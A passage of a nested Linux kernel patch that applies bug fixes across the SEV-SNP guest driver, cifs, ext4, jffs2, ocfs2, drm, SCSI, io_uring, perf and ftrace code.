++		 * order to increment the sequence number and thus avoid
++		 * IV reuse.
++		 */
++		override_npages = snp_dev->input.data_npages;
++		exit_code	= SVM_VMGEXIT_GUEST_REQUEST;
+ 
+-	/*
+-	 * If the extended guest request fails due to having too small of a
+-	 * certificate data buffer, retry the same guest request without the
+-	 * extended data request in order to increment the sequence number
+-	 * and thus avoid IV reuse.
+-	 */
+-	if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-	    err == SNP_GUEST_REQ_INVALID_LEN) {
+-		const unsigned int certs_npages = snp_dev->input.data_npages;
+-
+-		exit_code = SVM_VMGEXIT_GUEST_REQUEST;
++		/*
++		 * Override the error to inform callers the given extended
++		 * request buffer size was too small and give the caller the
++		 * required buffer size.
++		 */
++		override_err	= SNP_GUEST_REQ_INVALID_LEN;
+ 
+ 		/*
+ 		 * If this call to the firmware succeeds, the sequence number can
+@@ -368,15 +365,20 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		 * of the VMPCK and the error code being propagated back to the
+ 		 * user as an ioctl() return code.
+ 		 */
+-		rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++		goto retry_request;
+ 
+-		/*
+-		 * Override the error to inform callers the given extended
+-		 * request buffer size was too small and give the caller the
+-		 * required buffer size.
+-		 */
+-		err = SNP_GUEST_REQ_INVALID_LEN;
+-		snp_dev->input.data_npages = certs_npages;
++	/*
++	 * The host may return SNP_GUEST_REQ_ERR_EBUSY if the request has been
++	 * throttled. Retry in the driver to avoid returning and reusing the
++	 * message sequence number on a different message.
++	 */
++	case -EAGAIN:
++		if (jiffies - req_start > SNP_REQ_MAX_RETRY_DURATION) {
++			rc = -ETIMEDOUT;
++			break;
++		}
++		schedule_timeout_killable(SNP_REQ_RETRY_DELAY);
++		goto retry_request;
+ 	}
+ 
+ 	/*
+@@ -388,7 +390,10 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	snp_inc_msg_seqno(snp_dev);
+ 
+ 	if (fw_err)
+-		*fw_err = err;
++		*fw_err = override_err ?: err;
++
++	if (override_npages)
++		snp_dev->input.data_npages = override_npages;
+ 
+ 	/*
+ 	 * If an extended guest request was issued and the supplied certificate
+@@ -396,29 +401,49 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent IV reuse. If the standard request was successful, return -EIO
+ 	 * back to the caller as would have originally been returned.
+ 	 */
+-	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++	if (!rc && override_err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
++	return rc;
++}
++
++static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
++				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
++				u32 resp_sz, __u64 *fw_err)
++{
++	u64 seqno;
++	int rc;
++
++	/* Get message sequence and verify that its a non-zero */
++	seqno = snp_get_msg_seqno(snp_dev);
++	if (!seqno)
+ 		return -EIO;
+ 
++	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
++
++	/* Encrypt the userspace provided payload */
++	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
++	if (rc)
++		return rc;
++
++	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+-			  rc, *fw_err);
+-		goto disable_vmpck;
++		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
++			return rc;
++
++		dev_alert(snp_dev->dev, "Detected error from ASP request. rc: %d, fw_err: %llu\n", rc, *fw_err);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	rc = verify_and_dec_payload(snp_dev, resp_buf, resp_sz);
+ 	if (rc) {
+-		dev_alert(snp_dev->dev,
+-			  "Detected unexpected decode failure from ASP. rc: %d\n",
+-			  rc);
+-		goto disable_vmpck;
++		dev_alert(snp_dev->dev, "Detected unexpected decode failure from ASP. rc: %d\n", rc);
++		snp_disable_vmpck(snp_dev);
++		return rc;
+ 	}
+ 
+ 	return 0;
+-
+-disable_vmpck:
+-	snp_disable_vmpck(snp_dev);
+-	return rc;
+ }
+ 
+ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+@@ -705,6 +730,9 @@ static int __init sev_guest_probe(struct platform_device *pdev)
+ 	void __iomem *mapping;
+ 	int ret;
+ 
++	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
++		return -ENODEV;
++
+ 	if (!dev->platform_data)
+ 		return -ENODEV;
+ 
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 442718cf61b86..7a2862c10afbd 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -233,15 +233,32 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		size[0] = 8; /* sizeof __le64 */
+ 		data[0] = ptr;
+ 
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_END_OF_FILE_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
++		if (cfile) {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++		} else {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						COMPOUND_FID,
++						COMPOUND_FID,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
+ 		if (rc)
+ 			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
++		num_rqst++;
+ 		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
+ 		break;
+ 	case SMB2_OP_SET_INFO:
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index 381babc1212c9..d827b7547ffad 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -425,7 +425,7 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 
+ 		/* safe to access primary channel, since it will never go away */
+ 		spin_lock(&ses->chan_lock);
+-		memcpy(ses->chans[0].signkey, ses->smb3signingkey,
++		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
+ 		       SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
+ 
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+index 3851d0aaa2886..c961b90f92b9f 100644
+--- a/fs/cifs/transport.c
++++ b/fs/cifs/transport.c
+@@ -297,7 +297,7 @@ static int
+ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		struct smb_rqst *rqst)
+ {
+-	int rc = 0;
++	int rc;
+ 	struct kvec *iov;
+ 	int n_vec;
+ 	unsigned int send_length = 0;
+@@ -308,6 +308,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 	struct msghdr smb_msg = {};
+ 	__be32 rfc1002_marker;
+ 
++	cifs_in_send_inc(server);
+ 	if (cifs_rdma_enabled(server)) {
+ 		/* return -EAGAIN when connecting or reconnecting */
+ 		rc = -EAGAIN;
+@@ -316,14 +317,17 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		goto smbd_done;
+ 	}
+ 
++	rc = -EAGAIN;
+ 	if (ssocket == NULL)
+-		return -EAGAIN;
++		goto out;
+ 
++	rc = -ERESTARTSYS;
+ 	if (fatal_signal_pending(current)) {
+ 		cifs_dbg(FYI, "signal pending before send request\n");
+-		return -ERESTARTSYS;
++		goto out;
+ 	}
+ 
++	rc = 0;
+ 	/* cork the socket */
+ 	tcp_sock_set_cork(ssocket->sk, true);
+ 
+@@ -434,7 +438,8 @@ smbd_done:
+ 			 rc);
+ 	else if (rc > 0)
+ 		rc = 0;
+-
++out:
++	cifs_in_send_dec(server);
+ 	return rc;
+ }
+ 
+@@ -853,9 +858,7 @@ cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+ 	 * I/O response may come back and free the mid entry on another thread.
+ 	 */
+ 	cifs_save_when_sent(mid);
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, 1, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	if (rc < 0) {
+ 		revert_current_mid(server, mid->credits);
+@@ -1146,9 +1149,7 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 		else
+ 			midQ[i]->callback = cifs_compound_last_callback;
+ 	}
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, num_rqst, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	for (i = 0; i < num_rqst; i++)
+ 		cifs_save_when_sent(midQ[i]);
+@@ -1398,9 +1399,7 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+ 
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+@@ -1541,9 +1540,7 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 	}
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 34c87fcfd0617..eea11ad84e680 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4807,13 +4807,6 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 		goto bad_inode;
+ 	raw_inode = ext4_raw_inode(&iloc);
+ 
+-	if ((ino == EXT4_ROOT_INO) && (raw_inode->i_links_count == 0)) {
+-		ext4_error_inode(inode, function, line, 0,
+-				 "iget: root inode unallocated");
+-		ret = -EFSCORRUPTED;
+-		goto bad_inode;
+-	}
+-
+ 	if ((flags & EXT4_IGET_HANDLE) &&
+ 	    (raw_inode->i_links_count == 0) && (raw_inode->i_mode == 0)) {
+ 		ret = -ESTALE;
+@@ -4886,11 +4879,16 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	 * NeilBrown 1999oct15
+ 	 */
+ 	if (inode->i_nlink == 0) {
+-		if ((inode->i_mode == 0 ||
++		if ((inode->i_mode == 0 || flags & EXT4_IGET_SPECIAL ||
+ 		     !(EXT4_SB(inode->i_sb)->s_mount_state & EXT4_ORPHAN_FS)) &&
+ 		    ino != EXT4_BOOT_LOADER_INO) {
+-			/* this inode is deleted */
+-			ret = -ESTALE;
++			/* this inode is deleted or unallocated */
++			if (flags & EXT4_IGET_SPECIAL) {
++				ext4_error_inode(inode, function, line, 0,
++						 "iget: special inode unallocated");
++				ret = -EFSCORRUPTED;
++			} else
++				ret = -ESTALE;
+ 			goto bad_inode;
+ 		}
+ 		/* The only unlinked inodes we let through here have
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 800d631c920b4..56f09598448b4 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3884,10 +3884,8 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval) {
+-			inode_unlock(old.inode);
++		if (retval)
+ 			goto end_rename;
+-		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 8011600999586..2528e8216c334 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -5967,8 +5967,11 @@ static int ext4_load_journal(struct super_block *sb,
+ 	if (!really_read_only && journal_devnum &&
+ 	    journal_devnum != le32_to_cpu(es->s_journal_dev)) {
+ 		es->s_journal_dev = cpu_to_le32(journal_devnum);
+-
+-		/* Make sure we flush the recovery flag to disk. */
++		ext4_commit_super(sb);
++	}
++	if (!really_read_only && journal_inum &&
++	    journal_inum != le32_to_cpu(es->s_journal_inum)) {
++		es->s_journal_inum = cpu_to_le32(journal_inum);
+ 		ext4_commit_super(sb);
+ 	}
+ 
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index e0eb6eb02a834..b17c1b90e1224 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -386,6 +386,17 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 	struct inode *inode;
+ 	int err;
+ 
++	/*
++	 * We have to check for this corruption early as otherwise
++	 * iget_locked() could wait indefinitely for the state of our
++	 * parent inode.
++	 */
++	if (parent->i_ino == ea_ino) {
++		ext4_error(parent->i_sb,
++			   "Parent and EA inode have the same ino %lu", ea_ino);
++		return -EFSCORRUPTED;
++	}
++
+ 	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_NORMAL);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+diff --git a/fs/jffs2/file.c b/fs/jffs2/file.c
+index ba86acbe12d3f..0479096b96e4c 100644
+--- a/fs/jffs2/file.c
++++ b/fs/jffs2/file.c
+@@ -137,19 +137,18 @@ static int jffs2_write_begin(struct file *filp, struct address_space *mapping,
+ 	struct jffs2_inode_info *f = JFFS2_INODE_INFO(inode);
+ 	struct jffs2_sb_info *c = JFFS2_SB_INFO(inode->i_sb);
+ 	pgoff_t index = pos >> PAGE_SHIFT;
+-	uint32_t pageofs = index << PAGE_SHIFT;
+ 	int ret = 0;
+ 
+ 	jffs2_dbg(1, "%s()\n", __func__);
+ 
+-	if (pageofs > inode->i_size) {
+-		/* Make new hole frag from old EOF to new page */
++	if (pos > inode->i_size) {
++		/* Make new hole frag from old EOF to new position */
+ 		struct jffs2_raw_inode ri;
+ 		struct jffs2_full_dnode *fn;
+ 		uint32_t alloc_len;
+ 
+-		jffs2_dbg(1, "Writing new hole frag 0x%x-0x%x between current EOF and new page\n",
+-			  (unsigned int)inode->i_size, pageofs);
++		jffs2_dbg(1, "Writing new hole frag 0x%x-0x%x between current EOF and new position\n",
++			  (unsigned int)inode->i_size, (uint32_t)pos);
+ 
+ 		ret = jffs2_reserve_space(c, sizeof(ri), &alloc_len,
+ 					  ALLOC_NORMAL, JFFS2_SUMMARY_INODE_SIZE);
+@@ -169,10 +168,10 @@ static int jffs2_write_begin(struct file *filp, struct address_space *mapping,
+ 		ri.mode = cpu_to_jemode(inode->i_mode);
+ 		ri.uid = cpu_to_je16(i_uid_read(inode));
+ 		ri.gid = cpu_to_je16(i_gid_read(inode));
+-		ri.isize = cpu_to_je32(max((uint32_t)inode->i_size, pageofs));
++		ri.isize = cpu_to_je32((uint32_t)pos);
+ 		ri.atime = ri.ctime = ri.mtime = cpu_to_je32(JFFS2_NOW());
+ 		ri.offset = cpu_to_je32(inode->i_size);
+-		ri.dsize = cpu_to_je32(pageofs - inode->i_size);
++		ri.dsize = cpu_to_je32((uint32_t)pos - inode->i_size);
+ 		ri.csize = cpu_to_je32(0);
+ 		ri.compr = JFFS2_COMPR_ZERO;
+ 		ri.node_crc = cpu_to_je32(crc32(0, &ri, sizeof(ri)-8));
+@@ -202,7 +201,7 @@ static int jffs2_write_begin(struct file *filp, struct address_space *mapping,
+ 			goto out_err;
+ 		}
+ 		jffs2_complete_reservation(c);
+-		inode->i_size = pageofs;
++		inode->i_size = pos;
+ 		mutex_unlock(&f->sem);
+ 	}
+ 
+diff --git a/fs/ocfs2/aops.c b/fs/ocfs2/aops.c
+index 1d65f6ef00ca8..0394505fdce3f 100644
+--- a/fs/ocfs2/aops.c
++++ b/fs/ocfs2/aops.c
+@@ -1977,11 +1977,26 @@ int ocfs2_write_end_nolock(struct address_space *mapping,
+ 	}
+ 
+ 	if (unlikely(copied < len) && wc->w_target_page) {
++		loff_t new_isize;
++
+ 		if (!PageUptodate(wc->w_target_page))
+ 			copied = 0;
+ 
+-		ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
+-				       start+len);
++		new_isize = max_t(loff_t, i_size_read(inode), pos + copied);
++		if (new_isize > page_offset(wc->w_target_page))
++			ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
++					       start+len);
++		else {
++			/*
++			 * When page is fully beyond new isize (data copy
++			 * failed), do not bother zeroing the page. Invalidate
++			 * it instead so that writeback does not get confused
++			 * put page & buffer dirty bits into inconsistent
++			 * state.
++			 */
++			block_invalidate_folio(page_folio(wc->w_target_page),
++						0, PAGE_SIZE);
++		}
+ 	}
+ 	if (wc->w_target_page)
+ 		flush_dcache_page(wc->w_target_page);
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 6b65b0dfb4fb4..288c6feda5de2 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -447,11 +447,11 @@ struct drm_bridge_funcs {
+ 	 *
+ 	 * The returned array must be allocated with kmalloc() and will be
+ 	 * freed by the caller. If the allocation fails, NULL should be
+-	 * returned. num_output_fmts must be set to the returned array size.
++	 * returned. num_input_fmts must be set to the returned array size.
+ 	 * Formats listed in the returned array should be listed in decreasing
+ 	 * preference order (the core will try all formats until it finds one
+ 	 * that works). When the format is not supported NULL should be
+-	 * returned and num_output_fmts should be set to 0.
++	 * returned and num_input_fmts should be set to 0.
+ 	 *
+ 	 * This method is called on all elements of the bridge chain as part of
+ 	 * the bus format negotiation process that happens in
+diff --git a/include/drm/drm_gem.h b/include/drm/drm_gem.h
+index bd42f25e449c2..60b2dda8d964b 100644
+--- a/include/drm/drm_gem.h
++++ b/include/drm/drm_gem.h
+@@ -472,7 +472,9 @@ int drm_gem_dumb_map_offset(struct drm_file *file, struct drm_device *dev,
+ void drm_gem_lru_init(struct drm_gem_lru *lru, struct mutex *lock);
+ void drm_gem_lru_remove(struct drm_gem_object *obj);
+ void drm_gem_lru_move_tail(struct drm_gem_lru *lru, struct drm_gem_object *obj);
+-unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru,
++			       unsigned int nr_to_scan,
++			       unsigned long *remaining,
+ 			       bool (*shrink)(struct drm_gem_object *obj));
+ 
+ #endif /* __DRM_GEM_H__ */
+diff --git a/include/linux/blk-mq.h b/include/linux/blk-mq.h
+index d6119c5d1069b..a9764cbf7f8d2 100644
+--- a/include/linux/blk-mq.h
++++ b/include/linux/blk-mq.h
+@@ -228,6 +228,12 @@ static inline unsigned short req_get_ioprio(struct request *req)
+ 	*(listptr) = rq;				\
+ } while (0)
+ 
++#define rq_list_add_tail(lastpptr, rq)	do {		\
++	(rq)->rq_next = NULL;				\
++	**(lastpptr) = rq;				\
++	*(lastpptr) = &rq->rq_next;			\
++} while (0)
++
+ #define rq_list_pop(listptr)				\
+ ({							\
+ 	struct request *__req = NULL;			\
+diff --git a/include/linux/fb.h b/include/linux/fb.h
+index 486c4e3b6d6a6..c7f0f14e1f74b 100644
+--- a/include/linux/fb.h
++++ b/include/linux/fb.h
+@@ -212,6 +212,7 @@ struct fb_deferred_io {
+ 	/* delay between mkwrite and deferred handler */
+ 	unsigned long delay;
+ 	bool sort_pagereflist; /* sort pagelist by offset */
++	int open_count; /* number of opened files; protected by fb_info lock */
+ 	struct mutex lock; /* mutex that protects the pageref list */
+ 	struct list_head pagereflist; /* list of pagerefs for touched pages */
+ 	/* callback */
+diff --git a/include/linux/interconnect-provider.h b/include/linux/interconnect-provider.h
+index cd5c5a27557f5..d12cd18aab3f4 100644
+--- a/include/linux/interconnect-provider.h
++++ b/include/linux/interconnect-provider.h
+@@ -122,6 +122,9 @@ int icc_link_destroy(struct icc_node *src, struct icc_node *dst);
+ void icc_node_add(struct icc_node *node, struct icc_provider *provider);
+ void icc_node_del(struct icc_node *node);
+ int icc_nodes_remove(struct icc_provider *provider);
++void icc_provider_init(struct icc_provider *provider);
++int icc_provider_register(struct icc_provider *provider);
++void icc_provider_deregister(struct icc_provider *provider);
+ int icc_provider_add(struct icc_provider *provider);
+ void icc_provider_del(struct icc_provider *provider);
+ struct icc_node_data *of_icc_get_from_provider(struct of_phandle_args *spec);
+@@ -167,6 +170,15 @@ static inline int icc_nodes_remove(struct icc_provider *provider)
+ 	return -ENOTSUPP;
+ }
+ 
++static inline void icc_provider_init(struct icc_provider *provider) { }
++
++static inline int icc_provider_register(struct icc_provider *provider)
++{
++	return -ENOTSUPP;
++}
++
++static inline void icc_provider_deregister(struct icc_provider *provider) { }
++
+ static inline int icc_provider_add(struct icc_provider *provider)
+ {
+ 	return -ENOTSUPP;
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index ba2bd604359d4..b072449b0f1ac 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -294,9 +294,11 @@ struct hh_cache {
+  * relationship HH alignment <= LL alignment.
+  */
+ #define LL_RESERVED_SPACE(dev) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom)&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ #define LL_RESERVED_SPACE_EXTRA(dev,extra) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom+(extra))&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom) + (extra)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ 
+ struct header_ops {
+ 	int	(*create) (struct sk_buff *skb, struct net_device *dev,
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index cb538bc579710..d20695184e0b9 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1417,6 +1417,7 @@ void pci_bus_add_resource(struct pci_bus *bus, struct resource *res,
+ 			  unsigned int flags);
+ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n);
+ void pci_bus_remove_resources(struct pci_bus *bus);
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res);
+ int devm_request_pci_bus_resources(struct device *dev,
+ 				   struct list_head *resources);
+ 
+diff --git a/include/linux/sh_intc.h b/include/linux/sh_intc.h
+index c255273b02810..37ad81058d6ae 100644
+--- a/include/linux/sh_intc.h
++++ b/include/linux/sh_intc.h
+@@ -97,7 +97,10 @@ struct intc_hw_desc {
+ 	unsigned int nr_subgroups;
+ };
+ 
+-#define _INTC_ARRAY(a) a, __same_type(a, NULL) ? 0 : sizeof(a)/sizeof(*a)
++#define _INTC_SIZEOF_OR_ZERO(a) (_Generic(a,                 \
++                                 typeof(NULL):  0,           \
++                                 default:       sizeof(a)))
++#define _INTC_ARRAY(a) a, _INTC_SIZEOF_OR_ZERO(a)/sizeof(*a)
+ 
+ #define INTC_HW_DESC(vectors, groups, mask_regs,	\
+ 		     prio_regs,	sense_regs, ack_regs)	\
+diff --git a/include/linux/tracepoint.h b/include/linux/tracepoint.h
+index 4b33b95eb8be7..b01421902cfce 100644
+--- a/include/linux/tracepoint.h
++++ b/include/linux/tracepoint.h
+@@ -231,12 +231,11 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+  * not add unwanted padding between the beginning of the section and the
+  * structure. Force alignment to the same alignment as the section start.
+  *
+- * When lockdep is enabled, we make sure to always do the RCU portions of
+- * the tracepoint code, regardless of whether tracing is on. However,
+- * don't check if the condition is false, due to interaction with idle
+- * instrumentation. This lets us find RCU issues triggered with tracepoints
+- * even when this tracepoint is off. This code has no purpose other than
+- * poking RCU a bit.
++ * When lockdep is enabled, we make sure to always test if RCU is
++ * "watching" regardless if the tracepoint is enabled or not. Tracepoints
++ * require RCU to be active, and it should always warn at the tracepoint
++ * site if it is not watching, as it will need to be active when the
++ * tracepoint is enabled.
+  */
+ #define __DECLARE_TRACE(name, proto, args, cond, data_proto)		\
+ 	extern int __traceiter_##name(data_proto);			\
+@@ -249,9 +248,7 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+ 				TP_ARGS(args),				\
+ 				TP_CONDITION(cond), 0);			\
+ 		if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) {		\
+-			rcu_read_lock_sched_notrace();			\
+-			rcu_dereference_sched(__tracepoint_##name.funcs);\
+-			rcu_read_unlock_sched_notrace();		\
++			WARN_ON_ONCE(!rcu_is_watching());		\
+ 		}							\
+ 	}								\
+ 	__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args),		\
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index c36656d8ac6c7..006858ed04e8c 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -145,6 +145,7 @@ struct scsi_device {
+ 	const char * model;		/* ... after scan; point to static string */
+ 	const char * rev;		/* ... "nullnullnullnull" before scan */
+ 
++#define SCSI_DEFAULT_VPD_LEN	255	/* default SCSI VPD page size (max) */
+ 	struct scsi_vpd __rcu *vpd_pg0;
+ 	struct scsi_vpd __rcu *vpd_pg83;
+ 	struct scsi_vpd __rcu *vpd_pg80;
+@@ -214,6 +215,7 @@ struct scsi_device {
+ 					 * creation time */
+ 	unsigned ignore_media_change:1; /* Ignore MEDIA CHANGE on resume */
+ 	unsigned silence_suspend:1;	/* Do not print runtime PM related messages */
++	unsigned no_vpd_size:1;		/* No VPD size reported in header */
+ 
+ 	unsigned int queue_stopped;	/* request queue is quiesced */
+ 	bool offline_already;		/* Device offline message logged */
+diff --git a/include/scsi/scsi_devinfo.h b/include/scsi/scsi_devinfo.h
+index 5d14adae21c78..6b548dc2c4965 100644
+--- a/include/scsi/scsi_devinfo.h
++++ b/include/scsi/scsi_devinfo.h
+@@ -32,7 +32,8 @@
+ #define BLIST_IGN_MEDIA_CHANGE	((__force blist_flags_t)(1ULL << 11))
+ /* do not do automatic start on add */
+ #define BLIST_NOSTARTONADD	((__force blist_flags_t)(1ULL << 12))
+-#define __BLIST_UNUSED_13	((__force blist_flags_t)(1ULL << 13))
++/* do not ask for VPD page size first on some broken targets */
++#define BLIST_NO_VPD_SIZE	((__force blist_flags_t)(1ULL << 13))
+ #define __BLIST_UNUSED_14	((__force blist_flags_t)(1ULL << 14))
+ #define __BLIST_UNUSED_15	((__force blist_flags_t)(1ULL << 15))
+ #define __BLIST_UNUSED_16	((__force blist_flags_t)(1ULL << 16))
+@@ -74,8 +75,7 @@
+ #define __BLIST_HIGH_UNUSED (~(__BLIST_LAST_USED | \
+ 			       (__force blist_flags_t) \
+ 			       ((__force __u64)__BLIST_LAST_USED - 1ULL)))
+-#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_13 | \
+-			     __BLIST_UNUSED_14 | \
++#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_14 | \
+ 			     __BLIST_UNUSED_15 | \
+ 			     __BLIST_UNUSED_16 | \
+ 			     __BLIST_UNUSED_24 | \
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 7d5b544cfc305..3526389ac2180 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -84,6 +84,8 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct file *src_file;
+ 	int ret;
+ 
++	if (msg->len)
++		return -EINVAL;
+ 	if (target_ctx == ctx)
+ 		return -EINVAL;
+ 	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+@@ -120,7 +122,7 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	 * completes with -EOVERFLOW, then the sender must ensure that a
+ 	 * later IORING_OP_MSG_RING delivers the message.
+ 	 */
+-	if (!io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
++	if (!io_post_aux_cqe(target_ctx, msg->user_data, ret, 0, true))
+ 		ret = -EOVERFLOW;
+ out_unlock:
+ 	io_double_unlock_ctx(ctx, target_ctx, issue_flags);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 3b9e86108f435..227ada7240295 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -2170,7 +2170,7 @@ static void perf_group_detach(struct perf_event *event)
+ 		/* Inherit group flags from the previous leader */
+ 		sibling->group_caps = event->group_caps;
+ 
+-		if (!RB_EMPTY_NODE(&event->group_node)) {
++		if (sibling->attach_state & PERF_ATTACH_CONTEXT) {
+ 			add_event_to_groups(sibling, event->ctx);
+ 
+ 			if (sibling->state == PERF_EVENT_STATE_ACTIVE)
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 6f726ea0fde01..59062fedeaf7c 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1537,7 +1537,8 @@ static struct dyn_ftrace *lookup_rec(unsigned long start, unsigned long end)
+ 	key.flags = end;	/* overload flags, as it is unsigned long */
+ 
+ 	for (pg = ftrace_pages_start; pg; pg = pg->next) {
+-		if (end < pg->records[0].ip ||
++		if (pg->index == 0 ||
++		    end < pg->records[0].ip ||
